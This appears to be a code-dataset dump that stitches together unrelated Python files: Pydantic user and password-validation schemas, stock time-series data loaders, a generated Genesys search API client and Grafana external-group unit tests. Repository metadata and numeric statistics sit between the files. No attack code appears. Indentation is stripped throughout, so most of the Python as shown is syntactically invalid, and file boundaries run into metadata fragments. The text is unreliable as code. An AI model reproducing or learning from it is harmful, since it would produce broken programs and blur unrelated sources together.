"Apache-2.0"
] | 17 | 2022-01-11T12:05:38.000Z | 2022-03-25T15:29:43.000Z | pipeline/schemas/user.py | neuro-ai-dev/pipeline | c7edcc83576158062fe48f266dfaea62d754e761 | [
"Apache-2.0"
] | null | null | null | from typing import List, Optional
from pydantic import validator
from .base import AvatarHolder, BaseModel, Patchable
from .token import TokenGet
from .validators import valid_email, valid_password, valid_username
class UserBase(AvatarHolder):
email: str
username: str
firstname: Optional[str]
lastname: Optional[str]
company: Optional[str]
job_title: Optional[str]
class UserGet(UserBase):
id: str
oauth_provider: Optional[str]
verified: Optional[bool]
subscribed: Optional[bool]
onboarded: Optional[bool]
class UserGetDetailed(UserGet):
tokens: List[TokenGet] = []
class UserGetEnriched(UserGetDetailed):
base_token: TokenGet
class UserPatch(Patchable, AvatarHolder):
firstname: Optional[str]
lastname: Optional[str]
company: Optional[str]
job_title: Optional[str]
subscribed: Optional[bool]
onboarded: Optional[bool]
class UserUsernamePatch(Patchable):
username: str
@validator("username")
def validate_username(cls, value):
if not valid_username(value):
raise ValueError(
(
"must contain between 3-24 characters, only alphanumerics, "
"hyphens and underscores."
)
)
return value
class UserEmailPatch(Patchable):
email: str
@validator("email")
def validate_email(cls, value):
lowered_value = value.lower()
if not valid_email(lowered_value):
raise ValueError("doesn't match standard email format")
return lowered_value
class UserPasswordPatch(Patchable):
old_password: str
password: str
@validator("password")
def validate_password(cls, value):
if not valid_password(value):
raise ValueError(
(
"must contain at least 8 characters, "
"one uppercase letter and one number."
)
)
return value
class UserPasswordResetPatch(Patchable):
password: str
@validator("password")
def validate_password(cls, value):
if not valid_password(value):
raise ValueError(
(
"must contain at least 8 characters, "
"one uppercase letter and one number."
)
)
return value
class UserLogin(BaseModel):
email: str
password: str
@validator("email")
def validate_email(cls, value):
lowered_value = value.lower()
if not valid_email(lowered_value):
raise ValueError("doesn't match standard email format")
return lowered_value
class UserOAuthLogin(BaseModel):
email: str
oauth_id: str
oauth_provider: str
# If present we check if the newly created User has a pending invite to
# join an Organisation and auto-join them if so
organisation_member_invite_id: Optional[str]
# If present we check if the newly created User has a created friend invite
# and update status of invite accordingly
friend_invite_id: Optional[str]
class UserCreate(UserBase):
password: str
username: Optional[str]
account_type: Optional[str]
# If present we check if the newly created User has a pending invite to
# join an Organisation and auto-join them if so
organisation_member_invite_id: Optional[str]
# If present we check if the newly created User has a created friend invite
# and update status of invite accordingly
friend_invite_id: Optional[str]
@validator("email")
def validate_email(cls, value):
lowered_value = value.lower()
if not valid_email(lowered_value):
raise ValueError("doesn't match standard email format")
return lowered_value
@validator("password")
def validate_password(cls, value):
if not valid_password(value):
raise ValueError(
(
"must contain at least 8 characters, "
"one uppercase letter and one number."
)
)
return value
@validator("username")
def validate_username(cls, value):
if not valid_username(value):
raise ValueError(
(
"must contain between 3-24 characters, "
"only alphanumerics, hyphens and underscores."
)
)
return value
| 27.140244 | 80 | 0.627949 | 484 | 4,451 | 5.679752 | 0.219008 | 0.060022 | 0.029101 | 0.023645 | 0.74136 | 0.74136 | 0.74136 | 0.706439 | 0.706439 | 0.706439 | 0 | 0.002896 | 0.30173 | 4,451 | 163 | 81 | 27.306748 | 0.881596 | 0.103123 | 0 | 0.619835 | 0 | 0 | 0.135576 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066116 | false | 0.140496 | 0.041322 | 0 | 0.570248 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
3017902d968eb92cfbab710242bd56cc99d6e76c | 13,701 | py | Python | stock/data.py | paul-hyun/sem_20201203 | 7bc4f0e40a410dd7f384ca266662dc5ba92210ac | [
"MIT"
] | 1 | 2021-01-14T04:06:53.000Z | 2021-01-14T04:06:53.000Z | stock/data.py | paul-hyun/sem_20201203 | 7bc4f0e40a410dd7f384ca266662dc5ba92210ac | [
"MIT"
] | null | null | null | stock/data.py | paul-hyun/sem_20201203 | 7bc4f0e40a410dd7f384ca266662dc5ba92210ac | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
from tqdm import tqdm, trange
# https://mkjjo.github.io/python/2019/01/10/scaler.html
class MinMaxScaler():
def __init__(self, min_val, max_val):
assert (max_val > min_val)
self.min_val = min_val
self.max_val = max_val
def scale_value(self, val):
return (val - self.min_val) / (self.max_val - self.min_val)
def inv_scale_value(self, scaled_val):
return self.min_val + scaled_val * (self.max_val - self.min_val)
def read_marcap(start, end, codes, marcap_data):
dfs = []
for year in range(start.year, end.year + 1):
csv_file = os.path.join(marcap_data, f'marcap-{year}.csv.gz')
df = pd.read_csv(csv_file, dtype={'Code': str})
dfs.append(df)
# 데이터 합치기
df_all = pd.concat(dfs)
# string을 date로 변환
df_all['Date'] = pd.to_datetime(df_all['Date'])
# codes 적용
df_all = df_all[df_all['Code'].isin(codes)]
# date 기간 적용
df_all = df_all[(start <= df_all["Date"]) & (df_all["Date"] <= end)]
# date 순으로 정렬
df_all = df_all.sort_values('Date', ascending=True)
return df_all
def load_datas(df, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq):
train_inputs, train_labels = [], []
test_inputs, test_labels = [], []
for i in trange(0, len(df) - n_seq):
x = df.iloc[i:i + n_seq][x_cols].to_numpy()
y = df.iloc[i + n_seq][y_col]
date = df.iloc[i + n_seq]['Date']
if train_start <= date <= train_end:
train_inputs.append(x)
train_labels.append(y)
elif test_start <= date <= test_end:
test_inputs.append(x)
test_labels.append(y)
else:
print(f'discard {date}')
train_inputs = np.array(train_inputs)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_labels = np.array(test_labels)
return train_inputs, train_labels, test_inputs, test_labels
def load_datas_scaled(df, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_labels = [], []
test_inputs, test_labels = [], []
for i in trange(0, len(df) - n_seq):
x = []
for j in range(n_seq):
xj = df.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y_scaler = scaler_dic[y_col]
y = y_scaler.scale_value(df.iloc[i + n_seq][y_col])
date = df.iloc[i + n_seq]['Date']
if train_start <= date <= train_end:
train_inputs.append(x)
train_labels.append(y)
elif test_start <= date <= test_end:
test_inputs.append(x)
test_labels.append(y)
else:
print(f'discard {date}')
train_inputs = np.array(train_inputs)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_labels = np.array(test_labels)
return train_inputs, train_labels, test_inputs, test_labels, scaler_dic
def _load_datas_by_code_x_multi(df, code, x_cols, y_col, n_seq, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y_scaler = scaler_dic[y_col]
y = y_scaler.scale_value(df_code.iloc[i + n_seq][y_col])
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y)
return data_dic
def load_datas_scaled_x_multi(df, code_to_id, y_code, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_codes, train_labels = [], [], []
test_inputs, test_codes, test_labels = [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_multi(df, code, x_cols, y_col, n_seq, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
x, y = data_dic[date]
if train_start <= date <= train_end:
train_inputs.append(x)
train_codes.append([code_to_id[code]] * n_seq)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_inputs.append(x)
test_codes.append([code_to_id[code]] * n_seq)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_inputs = np.array(train_inputs)
train_codes = np.array(train_codes)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_codes = np.array(test_codes)
test_labels = np.array(test_labels)
return train_inputs, train_codes, train_labels, test_inputs, test_codes, test_labels, scaler_dic
def _load_datas_by_code_x_y_multi(df, code, x_cols, y_cols, n_seq, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y = []
yj = df_code.iloc[i + n_seq]
for col in y_cols:
y_scaler = scaler_dic[col]
y.append(y_scaler.scale_value(yj[col]))
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y)
return data_dic
def load_datas_scaled_x_y_multi(df, code_to_id, y_code, x_cols, y_cols, train_start, train_end, test_start, test_end, n_seq):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_codes, train_labels = [], [], []
test_inputs, test_codes, test_labels = [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_y_multi(df, code, x_cols, y_cols, n_seq, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
x, y = data_dic[date]
if train_start <= date <= train_end:
train_inputs.append(x)
train_codes.append([code_to_id[code]] * n_seq)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_inputs.append(x)
test_codes.append([code_to_id[code]] * n_seq)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_inputs = np.array(train_inputs)
train_codes = np.array(train_codes)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_codes = np.array(test_codes)
test_labels = np.array(test_labels)
return train_inputs, train_codes, train_labels, test_inputs, test_codes, test_labels, scaler_dic
def _load_datas_by_code_x_y_step(df, code, x_cols, y_col, n_seq, y_step, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq - y_step + 1):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y = []
for j in range(y_step):
yj = df_code.iloc[i + n_seq + j]
y_scaler = scaler_dic[y_col]
y.append(y_scaler.scale_value(yj[y_col]))
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y)
return data_dic
def load_datas_scaled_x_y_step(df, code_to_id, y_code, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq, y_step):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_inputs, train_codes, train_labels = [], [], []
test_inputs, test_codes, test_labels = [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_y_step(df, code, x_cols, y_col, n_seq, y_step, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
x, y = data_dic[date]
if train_start <= date <= train_end:
train_inputs.append(x)
train_codes.append([code_to_id[code]] * n_seq)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_inputs.append(x)
test_codes.append([code_to_id[code]] * n_seq)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_inputs = np.array(train_inputs)
train_codes = np.array(train_codes)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_codes = np.array(test_codes)
test_labels = np.array(test_labels)
return train_inputs, train_codes, train_labels, test_inputs, test_codes, test_labels, scaler_dic
def _load_datas_by_code_x_y_s2s(df, code, x_cols, y_col, n_seq, y_step, scaler_dic):
df_code = df[df['Code'] == code]
data_dic = {}
for i in trange(0, len(df_code) - n_seq - y_step + 1):
x = []
for j in range(n_seq):
xj = df_code.iloc[i + j]
xh = []
for col in x_cols:
x_scaler = scaler_dic[col]
xh.append(x_scaler.scale_value(xj[col]))
x.append(xh)
y = []
for j in range(y_step + 1):
yj = df_code.iloc[i + n_seq - 1 + j]
y_scaler = scaler_dic[y_col]
y.append([y_scaler.scale_value(yj[y_col])])
date = df_code.iloc[i + n_seq]['Date']
data_dic[date] = (x, y[:-1], y[1:])
return data_dic
def load_datas_scaled_x_y_s2s(df, code_to_id, y_code, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq, y_step):
scaler_dic = {}
for col in x_cols:
min_val = df[col].min()
max_val = df[col].max()
scaler_dic[col] = MinMaxScaler(min_val, max_val)
train_enc_inputs, train_codes, train_dec_inputs, train_labels = [], [], [], []
test_enc_inputs, test_codes, test_dec_inputs, test_labels = [], [], [], []
data_code_dic = {}
for code in code_to_id.keys():
data_dic = _load_datas_by_code_x_y_s2s(df, code, x_cols, y_col, n_seq, y_step, scaler_dic)
data_code_dic[code] = data_dic
date_list = df['Date'].unique()
for i, date in enumerate(tqdm(date_list)):
date = pd.to_datetime(date)
for code in code_to_id.keys():
data_dic = data_code_dic[code]
if date in data_dic:
enc_x, dec_x, y = data_dic[date]
if train_start <= date <= train_end:
train_enc_inputs.append(enc_x)
train_codes.append([code_to_id[code]] * n_seq)
train_dec_inputs.append(dec_x)
train_labels.append(y)
elif test_start <= date <= test_end and code == y_code:
test_enc_inputs.append(enc_x)
test_codes.append([code_to_id[code]] * n_seq)
test_dec_inputs.append(dec_x)
test_labels.append(y)
else:
print(f'discard {date} / {code}')
else:
print(f'not exists {date} / {code}')
train_enc_inputs = np.array(train_enc_inputs)
train_codes = np.array(train_codes)
train_dec_inputs = np.array(train_dec_inputs)
train_labels = np.array(train_labels)
test_enc_inputs = np.array(test_enc_inputs)
test_codes = np.array(test_codes)
test_dec_inputs = np.array(test_dec_inputs)
test_labels = np.array(test_labels)
return train_enc_inputs, train_codes, train_dec_inputs, train_labels, test_enc_inputs, test_codes, test_dec_inputs, test_labels, scaler_dic
| 35.311856 | 143 | 0.586162 | 2,048 | 13,701 | 3.584961 | 0.058594 | 0.025061 | 0.021792 | 0.042904 | 0.9003 | 0.874149 | 0.873604 | 0.866658 | 0.839145 | 0.829338 | 0 | 0.002593 | 0.296329 | 13,701 | 387 | 144 | 35.403101 | 0.758946 | 0.009634 | 0 | 0.778135 | 0 | 0 | 0.024189 | 0 | 0 | 0 | 0 | 0 | 0.003215 | 1 | 0.045016 | false | 0 | 0.012862 | 0.006431 | 0.102894 | 0.032154 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3030cf998b8a39306d394a60f5a52ecedc9a1451 | 13,775 | py | Python | build/PureCloudPlatformClientV2/apis/suggest_api.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | 10 | 2019-02-22T00:27:08.000Z | 2021-09-12T23:23:44.000Z | libs/PureCloudPlatformClientV2/apis/suggest_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 5 | 2018-06-07T08:32:00.000Z | 2021-07-28T17:37:26.000Z | libs/PureCloudPlatformClientV2/apis/suggest_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 6 | 2020-04-09T17:43:07.000Z | 2022-02-17T08:48:05.000Z | # coding: utf-8
"""
SuggestApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SuggestApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_search(self, q64, **kwargs):
"""
Search using the q64 value returned from a previous search.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_search(q64, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q64: q64 (required)
:param list[str] expand: Which fields, if any, to expand
:param bool profile: profile
:return: JsonNodeSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q64', 'expand', 'profile']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'q64' is set
if ('q64' not in params) or (params['q64'] is None):
raise ValueError("Missing the required parameter `q64` when calling `get_search`")
resource_path = '/api/v2/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q64' in params:
query_params['q64'] = params['q64']
if 'expand' in params:
query_params['expand'] = params['expand']
if 'profile' in params:
query_params['profile'] = params['profile']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='JsonNodeSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_search_suggest(self, q64, **kwargs):
"""
Suggest resources using the q64 value returned from a previous suggest query.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_search_suggest(q64, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q64: q64 (required)
:param list[str] expand: Which fields, if any, to expand
:param bool profile: profile
:return: JsonNodeSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q64', 'expand', 'profile']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_search_suggest" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'q64' is set
if ('q64' not in params) or (params['q64'] is None):
raise ValueError("Missing the required parameter `q64` when calling `get_search_suggest`")
resource_path = '/api/v2/search/suggest'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q64' in params:
query_params['q64'] = params['q64']
if 'expand' in params:
query_params['expand'] = params['expand']
if 'profile' in params:
query_params['profile'] = params['profile']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='JsonNodeSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_search(self, body, **kwargs):
"""
Search resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_search(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param SearchRequest body: Search request options (required)
:param bool profile: profile
:return: JsonNodeSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'profile']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_search`")
resource_path = '/api/v2/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'profile' in params:
query_params['profile'] = params['profile']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='JsonNodeSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_search_suggest(self, body, **kwargs):
"""
Suggest resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_search_suggest(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param SuggestSearchRequest body: Search request options (required)
:param bool profile: profile
:return: JsonNodeSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'profile']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_search_suggest" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_search_suggest`")
resource_path = '/api/v2/search/suggest'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'profile' in params:
query_params['profile'] = params['profile']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='JsonNodeSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 36.441799 | 104 | 0.544537 | 1,357 | 13,775 | 5.374355 | 0.146647 | 0.03949 | 0.037296 | 0.023036 | 0.85109 | 0.844508 | 0.844508 | 0.844508 | 0.834362 | 0.834362 | 0 | 0.007739 | 0.37147 | 13,775 | 377 | 105 | 36.538462 | 0.834604 | 0.28559 | 0 | 0.833333 | 0 | 0 | 0.152526 | 0.016621 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026042 | false | 0 | 0.036458 | 0 | 0.088542 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0644a3d0c7527c2dfcbf85ed87b999a1e1138cac | 5,051 | py | Python | tests/unittests/test_external_group.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | 2 | 2022-02-01T20:18:48.000Z | 2022-02-02T01:22:14.000Z | tests/unittests/test_external_group.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | 5 | 2022-01-12T06:55:54.000Z | 2022-03-26T13:35:50.000Z | tests/unittests/test_external_group.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from unittest.mock import MagicMock, Mock, patch
from src.grafana_api.model import APIModel
from src.grafana_api.external_group import ExternalGroup
class ExternalGroupTestCase(TestCase):
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_external_groups(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list([{"orgId": "test"}]))
call_the_api_mock.return_value = mock
self.assertEqual(
list([{"orgId": "test"}]),
external_group.get_external_groups(1),
)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_external_groups_no_team_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list())
call_the_api_mock.return_value = mock
with self.assertRaises(ValueError):
external_group.get_external_groups(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_external_groups_no_valid_result(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
external_group.get_external_groups(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_external_group(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Group added to Team"}))
call_the_api_mock.return_value = mock
self.assertEqual(
None,
external_group.add_external_group(
1, "cn=editors,ou=groups,dc=grafana,dc=org"
),
)
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_external_group_no_team_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(ValueError):
external_group.add_external_group(0, "")
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_external_group_no_valid_result(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
external_group.add_external_group(
1, "cn=editors,ou=groups,dc=grafana,dc=org"
)
@patch("src.grafana_api.api.Api.call_the_api")
def test_remove_external_group(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Team Group removed"}))
call_the_api_mock.return_value = mock
self.assertEqual(
None,
external_group.remove_external_group(
1, "cn=editors,ou=groups,dc=grafana,dc=org"
),
)
@patch("src.grafana_api.api.Api.call_the_api")
def test_remove_external_group_no_team_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(ValueError):
external_group.remove_external_group(0, "")
@patch("src.grafana_api.api.Api.call_the_api")
def test_remove_external_group_no_valid_result(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
external_group: ExternalGroup = ExternalGroup(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
external_group.remove_external_group(
1, "cn=editors,ou=groups,dc=grafana,dc=org"
)
